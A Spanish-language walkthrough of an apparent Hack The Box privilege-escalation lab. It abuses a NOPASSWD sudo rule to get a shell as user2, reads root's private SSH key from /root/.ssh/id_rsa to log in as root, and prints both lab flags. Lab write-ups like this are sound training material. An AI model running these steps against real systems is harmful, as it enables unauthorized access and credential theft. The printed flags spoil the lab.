A veces, resolver un laboratorio de escalada de privilegios parece más complicado de lo que realmente es. Este walkthrough te guiaré paso a paso para completar el reto sin que te marees.

Lección clave: La solución muchas veces es más simple de lo que piensas, así que empieza siempre con lo básico.

Paso 1: Conéctate al servidor

Lo primero que debes hacer es conectarte al servidor usando las credenciales proporcionadas:

ssh user1@<IP> -p <PUERTO>

Verifica tu entorno inicial:

• ¿Quién eres?: Usa whoami para saber el usuario actual.
• ¿Dónde estás?: Usa pwd para conocer tu ubicación en el sistema.
• ¿Qué tienes alrededor?: Usa ls -la para explorar los archivos en tu directorio.

Paso 2: Enumera permisos con sudo

Una vez conectado, verifica qué permisos tienes como usuario inicial. Este paso es clave para descubrir posibles rutas de escalada:

sudo -l

Busca algo como esto:

(user2 : user2) NOPASSWD: /bin/bash

Esto indica que puedes ejecutar /bin/bash como user2 sin contraseña. Si ves algo similar, ¡vas por buen camino!

Paso 3: Cambia al usuario user2

Aprovecha los permisos descubiertos en el paso anterior para convertirte en user2:

sudo -u user2 /bin/bash

Verifica que ahora estás operando como user2:

whoami

Paso 4: Encuentra la primera bandera

Como user2, busca y lee el archivo flag.txt en el directorio de este usuario:

cat /home/user2/flag.txt

HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

¡Felicidades! Ya tienes la primera bandera. Ahora vamos por el acceso a root.

Paso 5: Escala privilegios a root

El objetivo final es obtener acceso como root. Aquí hay una posible estrategia:

Busca el archivo de clave SSH de root:

cat /root/.ssh/id_rsa

Si tienes acceso a este archivo:

Copia su contenido y guárdalo en tu máquina local en un archivo llamado id_rsa. Para ésto vas a escribir

vim id_rsa

Pegas el contenido del archivo y escribes wq para guardar los cambios y salir.

Asegúrate de que el archivo tenga los permisos correctos:

chmod 600 id_rsa

Usa la clave para conectarte al servidor como root:

ssh root@<IP> -p <PUERTO> -i id_rsa 

Paso 6: Encuentra la bandera de root

Ahora que eres root, ve al directorio /root y lee el archivo flag.txt:

cat /root/flag.txt

HTB{pr1v1l363_35c4l4710n_2_r007}

Laboratorio listo!

Reflexiones finales
Este laboratorio nos enseña algo importante: muchas veces, la solución más efectiva es también la más simple. Antes de complicarte con estrategias avanzadas, recuerda:

• Enumera lo básico: Comienza con comandos simples como sudo -l o ls -la.
• Explora opciones obvias: Aprovecha lo que ya tienes antes de buscar herramientas externas.
• Reflexiona después de cada reto: Cada experiencia es una oportunidad para mejorar.
• ¡Ahora es tu turno de aplicar este conocimiento y enfrentarte a nuevos desafíos con confianza!